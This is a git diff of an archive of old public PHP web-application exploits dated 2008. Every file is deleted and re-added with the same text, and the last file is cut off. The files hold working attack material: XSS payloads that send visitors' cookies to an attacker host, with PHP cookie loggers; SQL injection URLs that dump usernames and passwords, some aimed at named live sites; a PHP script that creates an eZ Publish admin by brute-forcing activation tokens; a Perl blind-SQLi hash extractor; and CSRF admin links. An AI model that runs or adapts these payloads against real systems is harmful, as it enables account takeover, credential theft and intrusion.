-operation
-1] register
-2] make longin
-3] use the HTML code below
--->
-<html><head>
-</head>
-<body>
-<form enctype="multipart/form-data" action="http://victim.org/flatnux/index.php?mod=08_Files&opmod=insertrecord" method="POST">
-titolo*<input  size ="20"  style="visibility:hidden;" value="filex <iframe  width="0" height="0" style="visibility:hidden;" src="javascript:window.location='http://attacker.org/grab.php?cmd='+document.cookie;"></iframe>" name="name" type="text" /><br />
-<textarea title="Inserisci qui la descrizione" cols="80"  rows="10"  name="description" style="visibility:hidden;" ></textarea><br />
-Immagine<input  size="20" name="foto1" type="file" style="visibility:hidden;" /><br />
-File<input  size="20" name="file" type="file" style="visibility:hidden;" /><br />
-<input type="submit" value="Zic">
-</form>
-</body></html>
-<!-- grab.php
-<?php $data = $_GET['cmd'];
-$date=date("j F, Y, g:i a");
-$referer=$_SERVER['HTTP_REFERER'];
-$fh = fopen("cookie.txt",'a+');
-fwrite($fh, $referer . " / " . $data."\n".$date."\n");
-fclose($fh);
-?>
--->
-
-<!-- xss variables mod foto
-
-/sections/05_Foto/photo.php?mod=05_Foto&foto=>"><script>alert(69)%3B</script>&lang=it
-/?mod=%3E%22%3E%3Cscript%3Ealert(69)%3B%3C/script%3E
-
--->
-
-# milw0rm.com [2008-12-14]
+<!--
+exploit flatnux grabber cookies visitor
+site :http://www.speleoalex.altervista.org/flatnuke3/index.php
+download:http://www.speleoalex.altervista.org/flatnuke3/index.php?mod=06_Download
+author:gmda
+
+Flatnux does not filter code html/javascript then you can injector in this way:
+
+operation
+1] register
+2] make longin
+3] use the HTML code below
+-->
+<html><head>
+</head>
+<body>
+<form enctype="multipart/form-data" action="http://victim.org/flatnux/index.php?mod=08_Files&opmod=insertrecord" method="POST">
+titolo*<input  size ="20"  style="visibility:hidden;" value="filex <iframe  width="0" height="0" style="visibility:hidden;" src="javascript:window.location='http://attacker.org/grab.php?cmd='+document.cookie;"></iframe>" name="name" type="text" /><br />
+<textarea title="Inserisci qui la descrizione" cols="80"  rows="10"  name="description" style="visibility:hidden;" ></textarea><br />
+Immagine<input  size="20" name="foto1" type="file" style="visibility:hidden;" /><br />
+File<input  size="20" name="file" type="file" style="visibility:hidden;" /><br />
+<input type="submit" value="Zic">
+</form>
+</body></html>
+<!-- grab.php
+<?php $data = $_GET['cmd'];
+$date=date("j F, Y, g:i a");
+$referer=$_SERVER['HTTP_REFERER'];
+$fh = fopen("cookie.txt",'a+');
+fwrite($fh, $referer . " / " . $data."\n".$date."\n");
+fclose($fh);
+?>
+-->
+
+<!-- xss variables mod foto
+
+/sections/05_Foto/photo.php?mod=05_Foto&foto=>"><script>alert(69)%3B</script>&lang=it
+/?mod=%3E%22%3E%3Cscript%3Ealert(69)%3B%3C/script%3E
+
+-->
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7465.txt b/platforms/php/webapps/7465.txt
index c645112cc..55f4d33ec 100755
--- a/platforms/php/webapps/7465.txt
+++ b/platforms/php/webapps/7465.txt
@@ -1,39 +1,39 @@
-[â– ]  IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities
- 
->---------------------------------------<
-
-> AuToR: XaDoS (SecurityCode Team)
-> Contact M&: xados [at] hotmail [dot] it
-> B§g: Blind $ql inJection
-> SIte vuln: http://www.cmsisweb.it
-
->---------------------------------------<
- 
- 
-[â– ] BlinD $qL:
- 
-|: http://www.example.com/index.php?id_sezione=[$qL] 
-
-> DeM0:
- 
-|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No]
- 
-|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$]
- 
- 
-[â– ] XSS: 
- 
-|: http://www.comune.avezzano.aq.it/index.php?azione=cerca  
-  In this modul (search) write:
- 
-  "><script>alert(document.cookie)</script> 
- 
-or another vuln Page:
- 
-|: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E
- 
-[â– ] Th4nKs::
- 
-\>Str0ke</ - \>Fuck you 007 hacker</ - \>Securitycode team</ - \>All italian hackers</
-
-# milw0rm.com [2008-12-14]
+[â– ]  IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities
+ 
+>---------------------------------------<
+
+> AuToR: XaDoS (SecurityCode Team)
+> Contact M&: xados [at] hotmail [dot] it
+> B§g: Blind $ql inJection
+> SIte vuln: http://www.cmsisweb.it
+
+>---------------------------------------<
+ 
+ 
+[â– ] BlinD $qL:
+ 
+|: http://www.example.com/index.php?id_sezione=[$qL] 
+
+> DeM0:
+ 
+|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No]
+ 
+|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$]
+ 
+ 
+[â– ] XSS: 
+ 
+|: http://www.comune.avezzano.aq.it/index.php?azione=cerca  
+  In this modul (search) write:
+ 
+  "><script>alert(document.cookie)</script> 
+ 
+or another vuln Page:
+ 
+|: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E
+ 
+[â– ] Th4nKs::
+ 
+\>Str0ke</ - \>Fuck you 007 hacker</ - \>Securitycode team</ - \>All italian hackers</
+
+# milw0rm.com [2008-12-14]
diff --git a/platforms/php/webapps/7473.php b/platforms/php/webapps/7473.php
index d7250141e..ac14113bb 100755
--- a/platforms/php/webapps/7473.php
+++ b/platforms/php/webapps/7473.php
@@ -1,181 +1,181 @@
-<?php
-
-/*
-	eZ Publish privilege escalation and weak activation token for new user exploit by s4avrd0w [s4avrd0w@p0c.ru]
-	Versions affected >= 3.5.6
-	eZ Publish privilege escalation resolved in 3.9.5, 3.10.1, 4.0.1
-	More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible
-
-	eZ Publish weak activation token for new user not resolved now (zero-day).
-	Vulnerable code in the version 3.9.2:
-		$hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) );
-	Vulnerable code in the version 4.0.1:
-		$hash = md5( time() . $user->attribute( 'contentobject_id' ) );
-	
-	* tested on version 3.9.2
-
-	usage: 
-
-	# ./eZPublish_create_admin_exploit.php -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]
-
-	The options are required:
-	 -u Login of the new admin on eZ Publish
-	 -p Password of the new admin on eZ Publish
-	 -s Target for privilege escalation
-
-	The options are optional:
-	 -t Unix timestamp for a date on target eZ Publish server
-		This option is required in a case when on a target server incorrect time is established.
-		Default is unix timestamp for a date on local computer.
-	 -e Email of the new admin on eZ Publish
-		Default is anybody@localhost.localhost.
-
-	example:
-
-	# ./eZPublish_create_admin_exploit.php -u=admin -p=P@ssw0rd -s=http://127.0.0.1/ -e=my_mail@google.com -t=1229194235
-	[+] Phase 1 successfully finished
-	[+] Use timestamp: 1229194235
-	[+] Begin bruteforce...
-	....................
-	[+] Phase 2 successfully finished
-
-	[+] Exploiting is finished successfully
-	[+] Login in system using admin/P@ssw0rd
-
-*/
-
-function help_argc($script_name)
-{
-print "
-usage:
-
-# ./".$script_name." -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]
-
-The options are required:
- -u Login of the new admin on eZ Publish
- -p Password of the new admin on eZ Publish
- -s Target for privilege escalation
-
-The options are optional:
- -t Unix timestamp for a date on target eZ Publish server
-	(default is unix timestamp for a date on local computer)
- -e Email of the new admin on eZ Publish
-	(default is anybody@localhost.localhost)
-
-example:
-
-# ./".$script_name." -u=admin -p=P@ssw0rd -s=http://127.0.0.1/
-[+] Phase 1 successfully finished
-[+] Use timestamp: 1229194235
-[+] Begin bruteforce...
-....................
-[+] Phase 2 successfully finished
-
-[+] Exploiting is finished successfully
-[+] Login in system using admin/P@ssw0rd
-";
-}
-
-function successfully($login,$password)
-{
-print "
-[+] Phase 2 successfully finished
-
-[+] Exploiting is finished successfully
-[+] Login in system using $login/$password
-";
-}
-
-if (($argc != 4 && $argc != 5 && $argc != 6) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
-{
-	help_argc($argv[0]);
-	exit(0);
-}
-else
-{
-	$ARG = array(); 
-	foreach ($argv as $arg) { 
-		if (strpos($arg, '-') === 0) { 
-			$key = substr($arg,1,1);
-			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
-		} 
-	}
-
-	if ($ARG[u] && $ARG[p] && $ARG[s])
-	{
-
-		if (!$ARG[e]) $ARG[e] = "anybody@localhost.localhost";
-
-			$post_fields = array(
-				'ContentObjectAttribute_data_user_login_30' => $ARG[u],
-				'ContentObjectAttribute_data_user_password_30' => $ARG[p],
-				'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
-				'ContentObjectAttribute_data_user_email_30' => $ARG[e],
-				'UserID' => '14',
-				'PublishButton' => '1'
-			);
-
-		$headers = array(
-		    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
-		    'Referer' => $ARG[s]
-		);
-
-		$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
-		$res_http->addPostFields($post_fields);
-		$res_http->addHeaders($headers);
-		try {
-			if ($ARG[t]) { $time = $ARG[t]; } else { $time = mktime( ); }
-    			$response = $res_http->send()->getBody();
-
-			if (eregi("success", $response) || eregi("Fatal error", $response))
-			{
-				print "[+] Phase 1 successfully finished\n";
-				print "[+] Use timestamp: $time\n";
-				print "[+] Begin bruteforce...\n";
-
-				for ($i = $time; $i<$time+100; $i++)
-				{
-					print ".";
-					$hash = md5( $i . "14" );
-					$res_http = new HttpRequest($ARG[s]."/user/activate/".$hash, HttpRequest::METH_GET);
-					$res_http->addHeaders($headers);
-					try {
-						$response = $res_http->send()->getBody();
-
-						if (eregi("Your account is now activated", $response))
-						{
-							successfully($ARG[u],$ARG[p]);
-							exit(1);
-						}
-
-
-					} catch (HttpException $exception) {
-						print "\n[-] Not connected";
-						exit(0);
-					}
-				}
-				print "\n[-] Exploit failed";
-			}
-			else
-			{
-				print "[-] Exploit failed";
-			}
-
-		} catch (HttpException $exception) {
-
-			print "[-] Not connected";
-			exit(0);
-
-		}
-
-	}
-	else
-	{
-		help_argc($argv[0]);
-		exit(0);
-	} 
-}
-
-?>
-
-# milw0rm.com [2008-12-15]
+<?php
+
+/*
+	eZ Publish privilege escalation and weak activation token for new user exploit by s4avrd0w [s4avrd0w@p0c.ru]
+	Versions affected >= 3.5.6
+	eZ Publish privilege escalation resolved in 3.9.5, 3.10.1, 4.0.1
+	More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible
+
+	eZ Publish weak activation token for new user not resolved now (zero-day).
+	Vulnerable code in the version 3.9.2:
+		$hash = md5( mktime( ) . $user->attribute( 'contentobject_id' ) );
+	Vulnerable code in the version 4.0.1:
+		$hash = md5( time() . $user->attribute( 'contentobject_id' ) );
+	
+	* tested on version 3.9.2
+
+	usage: 
+
+	# ./eZPublish_create_admin_exploit.php -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]
+
+	The options are required:
+	 -u Login of the new admin on eZ Publish
+	 -p Password of the new admin on eZ Publish
+	 -s Target for privilege escalation
+
+	The options are optional:
+	 -t Unix timestamp for a date on target eZ Publish server
+		This option is required in a case when on a target server incorrect time is established.
+		Default is unix timestamp for a date on local computer.
+	 -e Email of the new admin on eZ Publish
+		Default is anybody@localhost.localhost.
+
+	example:
+
+	# ./eZPublish_create_admin_exploit.php -u=admin -p=P@ssw0rd -s=http://127.0.0.1/ -e=my_mail@google.com -t=1229194235
+	[+] Phase 1 successfully finished
+	[+] Use timestamp: 1229194235
+	[+] Begin bruteforce...
+	....................
+	[+] Phase 2 successfully finished
+
+	[+] Exploiting is finished successfully
+	[+] Login in system using admin/P@ssw0rd
+
+*/
+
+function help_argc($script_name)
+{
+print "
+usage:
+
+# ./".$script_name." -u=username -p=password -s=EZPublish_server [ -e=email -t=timestamp ]
+
+The options are required:
+ -u Login of the new admin on eZ Publish
+ -p Password of the new admin on eZ Publish
+ -s Target for privilege escalation
+
+The options are optional:
+ -t Unix timestamp for a date on target eZ Publish server
+	(default is unix timestamp for a date on local computer)
+ -e Email of the new admin on eZ Publish
+	(default is anybody@localhost.localhost)
+
+example:
+
+# ./".$script_name." -u=admin -p=P@ssw0rd -s=http://127.0.0.1/
+[+] Phase 1 successfully finished
+[+] Use timestamp: 1229194235
+[+] Begin bruteforce...
+....................
+[+] Phase 2 successfully finished
+
+[+] Exploiting is finished successfully
+[+] Login in system using admin/P@ssw0rd
+";
+}
+
+function successfully($login,$password)
+{
+print "
+[+] Phase 2 successfully finished
+
+[+] Exploiting is finished successfully
+[+] Login in system using $login/$password
+";
+}
+
+if (($argc != 4 && $argc != 5 && $argc != 6) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
+{
+	help_argc($argv[0]);
+	exit(0);
+}
+else
+{
+	$ARG = array(); 
+	foreach ($argv as $arg) { 
+		if (strpos($arg, '-') === 0) { 
+			$key = substr($arg,1,1);
+			if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); 
+		} 
+	}
+
+	if ($ARG[u] && $ARG[p] && $ARG[s])
+	{
+
+		if (!$ARG[e]) $ARG[e] = "anybody@localhost.localhost";
+
+			$post_fields = array(
+				'ContentObjectAttribute_data_user_login_30' => $ARG[u],
+				'ContentObjectAttribute_data_user_password_30' => $ARG[p],
+				'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p],
+				'ContentObjectAttribute_data_user_email_30' => $ARG[e],
+				'UserID' => '14',
+				'PublishButton' => '1'
+			);
+
+		$headers = array(
+		    'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
+		    'Referer' => $ARG[s]
+		);
+
+		$res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST);
+		$res_http->addPostFields($post_fields);
+		$res_http->addHeaders($headers);
+		try {
+			if ($ARG[t]) { $time = $ARG[t]; } else { $time = mktime( ); }
+    			$response = $res_http->send()->getBody();
+
+			if (eregi("success", $response) || eregi("Fatal error", $response))
+			{
+				print "[+] Phase 1 successfully finished\n";
+				print "[+] Use timestamp: $time\n";
+				print "[+] Begin bruteforce...\n";
+
+				for ($i = $time; $i<$time+100; $i++)
+				{
+					print ".";
+					$hash = md5( $i . "14" );
+					$res_http = new HttpRequest($ARG[s]."/user/activate/".$hash, HttpRequest::METH_GET);
+					$res_http->addHeaders($headers);
+					try {
+						$response = $res_http->send()->getBody();
+
+						if (eregi("Your account is now activated", $response))
+						{
+							successfully($ARG[u],$ARG[p]);
+							exit(1);
+						}
+
+
+					} catch (HttpException $exception) {
+						print "\n[-] Not connected";
+						exit(0);
+					}
+				}
+				print "\n[-] Exploit failed";
+			}
+			else
+			{
+				print "[-] Exploit failed";
+			}
+
+		} catch (HttpException $exception) {
+
+			print "[-] Not connected";
+			exit(0);
+
+		}
+
+	}
+	else
+	{
+		help_argc($argv[0]);
+		exit(0);
+	} 
+}
+
+?>
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7474.txt b/platforms/php/webapps/7474.txt
index fe72a7abe..192fd3581 100755
--- a/platforms/php/webapps/7474.txt
+++ b/platforms/php/webapps/7474.txt
@@ -1,24 +1,24 @@
-#Free Links Directory Script (id) SQL Injection Vulnerability
-
-
-#Author: nuclear
-
-
-#site:
-http://flds-script.com
-
-
-#vuln:
-http://localhost/[path]/lpro.php?id=-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users
-
-
-#demo:
-http://flds-script.com/demo/lpro.php?id=-1%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11%20from%20users
-
-#notes:
-Script is full of bugs like this, too bored to catch em all !
-
-
-#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
-
-# milw0rm.com [2008-12-15]
+#Free Links Directory Script (id) SQL Injection Vulnerability
+
+
+#Author: nuclear
+
+
+#site:
+http://flds-script.com
+
+
+#vuln:
+http://localhost/[path]/lpro.php?id=-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users
+
+
+#demo:
+http://flds-script.com/demo/lpro.php?id=-1%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11%20from%20users
+
+#notes:
+Script is full of bugs like this, too bored to catch em all !
+
+
+#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7475.txt b/platforms/php/webapps/7475.txt
index 4ab79486a..5ada1cf5e 100755
--- a/platforms/php/webapps/7475.txt
+++ b/platforms/php/webapps/7475.txt
@@ -1,79 +1,79 @@
-############################################################################################
-[+] BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF
-[+] Discovered By SirGod
-[+] Greetz : All my friends
-############################################################################################
-
-[+] Cookie Grabber Exploit
-
-  - Steal the cookie of any visitor.
-
-1.Register as :
-
-<script>document.location
-="http://[yourdomain]/[path]/stealer.php?cookie=" +
-document.cookie;</script>
-
-Everyone who visit the index page will be redirected on your cookie
-grabber. (because you will be the Latest Member)
-
-Be sure that you use " and not ' because is forbbiden to use that char
-is your username.
-
-2 . In stealer.php use the following code (simple cookie grabber)
-
-<?php
-$cookie = $_GET['cookie'];
-$log = fopen("log.txt", "a");
-fwrite($log, $cookie ."\n");
-fclose($log);
-?>
-
-Make sure that you have in the stealer.php directory a file log.txt .
-For stealed cookies check log.txt .
-
-3 . You will grab every visitor cookie .
-
-Example (cookie) of a not logged in user :
-
-PHPSESSID=gtolfce6jppb4oasfm81efrqf6
-
-Example (cookie) of a logged in user (admin) :
-
-bb_name=admin; bb_password=d73ed8a01f624fcb878296bc7ff302bc;
-PHPSESSID=gtolfce6jppb4oasfm81efrqf6
-
-Username is bb_name.Password is bb_password and is hashed as md5.
-
-[+] Cross Site Request Forgery
-
-If a logged in user with administrative permissions click one of the
-following links the specified action will be executed.
-
-- Delete category
-
-http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=[CatID]
-
-http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=5
-
-- Delete group
-
-http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=[GroupID]
-
-http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=2
-
-- Ban User
-
-http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=[UserID]
-
-http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=4
-
-- Delete User
-
-http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=[UserID]
-
-http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=4
-
-############################################################################################
-
-# milw0rm.com [2008-12-15]
+############################################################################################
+[+] BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF
+[+] Discovered By SirGod
+[+] Greetz : All my friends
+############################################################################################
+
+[+] Cookie Grabber Exploit
+
+  - Steal the cookie of any visitor.
+
+1.Register as :
+
+<script>document.location
+="http://[yourdomain]/[path]/stealer.php?cookie=" +
+document.cookie;</script>
+
+Everyone who visit the index page will be redirected on your cookie
+grabber. (because you will be the Latest Member)
+
+Be sure that you use " and not ' because is forbbiden to use that char
+is your username.
+
+2 . In stealer.php use the following code (simple cookie grabber)
+
+<?php
+$cookie = $_GET['cookie'];
+$log = fopen("log.txt", "a");
+fwrite($log, $cookie ."\n");
+fclose($log);
+?>
+
+Make sure that you have in the stealer.php directory a file log.txt .
+For stealed cookies check log.txt .
+
+3 . You will grab every visitor cookie .
+
+Example (cookie) of a not logged in user :
+
+PHPSESSID=gtolfce6jppb4oasfm81efrqf6
+
+Example (cookie) of a logged in user (admin) :
+
+bb_name=admin; bb_password=d73ed8a01f624fcb878296bc7ff302bc;
+PHPSESSID=gtolfce6jppb4oasfm81efrqf6
+
+Username is bb_name.Password is bb_password and is hashed as md5.
+
+[+] Cross Site Request Forgery
+
+If a logged in user with administrative permissions click one of the
+following links the specified action will be executed.
+
+- Delete category
+
+http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=[CatID]
+
+http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=5
+
+- Delete group
+
+http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=[GroupID]
+
+http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=2
+
+- Ban User
+
+http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=[UserID]
+
+http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=4
+
+- Delete User
+
+http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=[UserID]
+
+http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=4
+
+############################################################################################
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7476.txt b/platforms/php/webapps/7476.txt
index f9ddd9636..1bd6cd757 100755
--- a/platforms/php/webapps/7476.txt
+++ b/platforms/php/webapps/7476.txt
@@ -1,78 +1,78 @@
-#!/usr/bin/perl -w
-# Mediatheka <= 4.2 Remote Blind SQL Injection Exploit
-# by athos - staker[at]hotmail[dot]it
-
-use strict;
-use LWP::UserAgent;
-
-my ($stop,$start,$hash);
-
-my $domain = shift;
-my $userid = shift or &usage;
-
-my @chars = (48..57, 97..102); 
-my $substr = 1; 
-my $http = new LWP::UserAgent;
-
-
-&usage unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/; 
-
-
-sub send_request
-{ 
-     my $post = undef;
-     my $host = $domain;
-     my $param = shift @_ or die $!;
-  
-     $host .= "/connection.php?guest=false";
-     $post = $http->post($host,[
-                                 user      => $param,
-                                 password  => 'anything'
-                               ]);
- 
-}
-
-
-sub give_char
-{
-     my $send = undef;
-     my ($charz,$uidz) = @_;
-  
-     $send = "' or (select if((ascii(substring".
-             "(password,$uidz,1))=$charz),".
-             "benchmark(200000000,char(0)),".
-            "0) from users where id=$userid)#";
-
-     return $send;
-}
-
-
-for(1..32) 
-{
-     foreach my $set(@chars)
-     {
-          my $start = time();
-    
-          send_request(give_char($set,$substr));
-    
-          my $stop = time();
-  
-         if($stop - $start > 6)
-         { 
-              syswrite(STDOUT,chr($set));
-              $hash .= chr($set);
-              $substr++; 
-              last;
-        }
-    }
-}
-
-sub usage
-{
-     print "[?] Mediatheka <= 4.2 Remote Blind SQL Injection Exploit\n";
-     print "[?] by athos - staker[at]hotmail[dot]it\n";
-     print "[?] Usage: perl $0 http://[host/path] [id]\n";
-     exit;
-}
-
-# milw0rm.com [2008-12-15]
+#!/usr/bin/perl -w
+# Mediatheka <= 4.2 Remote Blind SQL Injection Exploit
+# by athos - staker[at]hotmail[dot]it
+
+use strict;
+use LWP::UserAgent;
+
+my ($stop,$start,$hash);
+
+my $domain = shift;
+my $userid = shift or &usage;
+
+my @chars = (48..57, 97..102); 
+my $substr = 1; 
+my $http = new LWP::UserAgent;
+
+
+&usage unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/; 
+
+
+sub send_request
+{ 
+     my $post = undef;
+     my $host = $domain;
+     my $param = shift @_ or die $!;
+  
+     $host .= "/connection.php?guest=false";
+     $post = $http->post($host,[
+                                 user      => $param,
+                                 password  => 'anything'
+                               ]);
+ 
+}
+
+
+sub give_char
+{
+     my $send = undef;
+     my ($charz,$uidz) = @_;
+  
+     $send = "' or (select if((ascii(substring".
+             "(password,$uidz,1))=$charz),".
+             "benchmark(200000000,char(0)),".
+            "0) from users where id=$userid)#";
+
+     return $send;
+}
+
+
+for(1..32) 
+{
+     foreach my $set(@chars)
+     {
+          my $start = time();
+    
+          send_request(give_char($set,$substr));
+    
+          my $stop = time();
+  
+         if($stop - $start > 6)
+         { 
+              syswrite(STDOUT,chr($set));
+              $hash .= chr($set);
+              $substr++; 
+              last;
+        }
+    }
+}
+
+sub usage
+{
+     print "[?] Mediatheka <= 4.2 Remote Blind SQL Injection Exploit\n";
+     print "[?] by athos - staker[at]hotmail[dot]it\n";
+     print "[?] Usage: perl $0 http://[host/path] [id]\n";
+     exit;
+}
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7478.txt b/platforms/php/webapps/7478.txt
index 39933971a..af3a55117 100755
--- a/platforms/php/webapps/7478.txt
+++ b/platforms/php/webapps/7478.txt
@@ -1,19 +1,19 @@
----------------------------------
-The Rat Cms Auth By Pass
----------------------------------
-Autore: x0r
-Email: andry2000@hotmail.it
---------------------------------
-Bug In: \login.php
-
-	$sql = "SELECT user_id 
-	        FROM tbl_auth_user
-			WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
-			
-$result = mysql_query($sql) or die('Query failed. ' . mysql_error()); 
-
-Exploit: ' or '1=1
-
-^^ Got Root?
-
-# milw0rm.com [2008-12-15]
+---------------------------------
+The Rat Cms Auth By Pass
+---------------------------------
+Autore: x0r
+Email: andry2000@hotmail.it
+--------------------------------
+Bug In: \login.php
+
+	$sql = "SELECT user_id 
+	        FROM tbl_auth_user
+			WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
+			
+$result = mysql_query($sql) or die('Query failed. ' . mysql_error()); 
+
+Exploit: ' or '1=1
+
+^^ Got Root?
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7479.txt b/platforms/php/webapps/7479.txt
index ef81f938c..2c6b2cab8 100755
--- a/platforms/php/webapps/7479.txt
+++ b/platforms/php/webapps/7479.txt
@@ -1,24 +1,24 @@
-##########################################
-#
-# XOOPS Module:  Amevents
-#
-#
-##########################################
-#
-##AUTHOR : netRoot
-####HOME : http://www.passw0rd.info
-#
-####MAÄ°L : msn@passw0rd.info
-#
-###########################################
-#
-# DORKS : dork: /modules/amevents/print.php?id=
-###########################################
- 
-target: scriptpage.com/modules/amevents/print.php?id=[sql Code]
- 
-Sql code: -98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*
- 
-live link: http://xxx.com/modules/amevents/print.php?id=-98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*
-
-# milw0rm.com [2008-12-15]
+##########################################
+#
+# XOOPS Module:  Amevents
+#
+#
+##########################################
+#
+##AUTHOR : netRoot
+####HOME : http://www.passw0rd.info
+#
+####MAÄ°L : msn@passw0rd.info
+#
+###########################################
+#
+# DORKS : dork: /modules/amevents/print.php?id=
+###########################################
+ 
+target: scriptpage.com/modules/amevents/print.php?id=[sql Code]
+ 
+Sql code: -98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*
+ 
+live link: http://xxx.com/modules/amevents/print.php?id=-98/**/union/**/select/**/1,2,3,4,uname,pass,7,8,9,10,11,12,13,14,15,16/**/from/**/xoops_users/*
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7480.txt b/platforms/php/webapps/7480.txt
index db1fa221e..18ef9fc5d 100755
--- a/platforms/php/webapps/7480.txt
+++ b/platforms/php/webapps/7480.txt
@@ -1,17 +1,17 @@
-###################################
-        Remote Sql Injection  CadeNix [ index.php ]
-           CadeNix  Online Games Play Online
-###################################
-# I am , HaCkeR _EgY
-# My Home : www.atsdp.com
-# Message : Mr.SQL   Really  I miss You , see u sooon My bro :)
-# Script : cadenix
-# Download : http://www.cadenix.com
-# Exploit :
-               http://site.com/demo/index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
-# Live Demo :
-               http://cadenix.com/demo/index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
-# Admin Panel  :   http://cadenix.com/demo/admin
-####################  Greetz  ::  Abo Mohamed  #####################
-
-# milw0rm.com [2008-12-15]
+###################################
+        Remote Sql Injection  CadeNix [ index.php ]
+           CadeNix  Online Games Play Online
+###################################
+# I am , HaCkeR _EgY
+# My Home : www.atsdp.com
+# Message : Mr.SQL   Really  I miss You , see u sooon My bro :)
+# Script : cadenix
+# Download : http://www.cadenix.com
+# Exploit :
+               http://site.com/demo/index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
+# Live Demo :
+               http://cadenix.com/demo/index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
+# Admin Panel  :   http://cadenix.com/demo/admin
+####################  Greetz  ::  Abo Mohamed  #####################
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/php/webapps/7481.txt b/platforms/php/webapps/7481.txt
index 5cdc8c1f7..1da6c45dc 100755
--- a/platforms/php/webapps/7481.txt
+++ b/platforms/php/webapps/7481.txt
@@ -1,49 +1,49 @@
-[START]
-
-#########################################################################################
-[0x01] Informations:
-
-Script         : WorkSimple 1.2.1
-Download       : http://www.hotscripts.com/jump.php?listing_id=85112&jump_type=1
-Vulnerability  : Remote File Inclusion / Sensitive Data Disclosure
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Notes          : Proud to be Italian
-Greets:        : XaDoS, x0r, emgent, Jay
-
-
